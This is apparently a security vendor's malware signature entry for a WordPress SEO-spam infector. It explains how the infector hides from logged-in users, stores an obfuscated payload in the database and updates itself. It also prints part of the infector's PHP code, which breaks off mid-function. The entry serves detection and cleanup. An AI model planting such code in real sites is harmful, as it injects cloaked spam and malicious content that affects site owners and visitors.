Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.spam-seo.wordpress-infector.001

php.spam-seo.wordpress-infector.001

Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is PHP based, thus intended for server-side use and the payload is executed directly on the server, while the site is loaded. Only the payload result (such as malicious iframe, or redirect) is visible in the browser, not the malicious code itself.
This malware is WordPress specific, relying not only on the filesystem to install itself, but the database (wp_options), where the final payload is stored obfuscated.
It has a update function, always looking for the most updated version of its code whenever executed.

Affecting

Any vulnerable WordPress based website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your files looking for the callback_function_php function, and check your WordPress database. Also, you can contact Sucuri to help you with the infection removal.

Dump


function callback_function_php($p)
{

if (isset($_COOKIE['wordpress_test_cookie']) || isset($_COOKIE['wp-settings-1']) || isset($_COOKIE['wp-settings-time-1']) || (function_exists('is_user_logged_in') && is_user_logged_in())) {
return $p;
}

$x = '{options_names}';
$buf = "";
$update = 0;
if (!$k = get_option($x)) {
if (!add_option($x, Array(), '', 'no')) {
return $p;
}
$update = 1;
} else {
$ctime = time() - @$k[1];
if ($ctime > 3600 * 12) {
$update = 1;
}

}
if ($update) {
$val = update_file_999();
$k = array();
$k[0] = $val;
$k[1] = time();
if (!update_option($x, $k)) {
return $p;
}
}
if (!$k = get_option($x)) {
return $p;
}

$buf = @$k[0];
if ($buf == "") {
return $p;
}
list($type, $text) = @explode("|||", $buf);
if ($text == "")
return $p;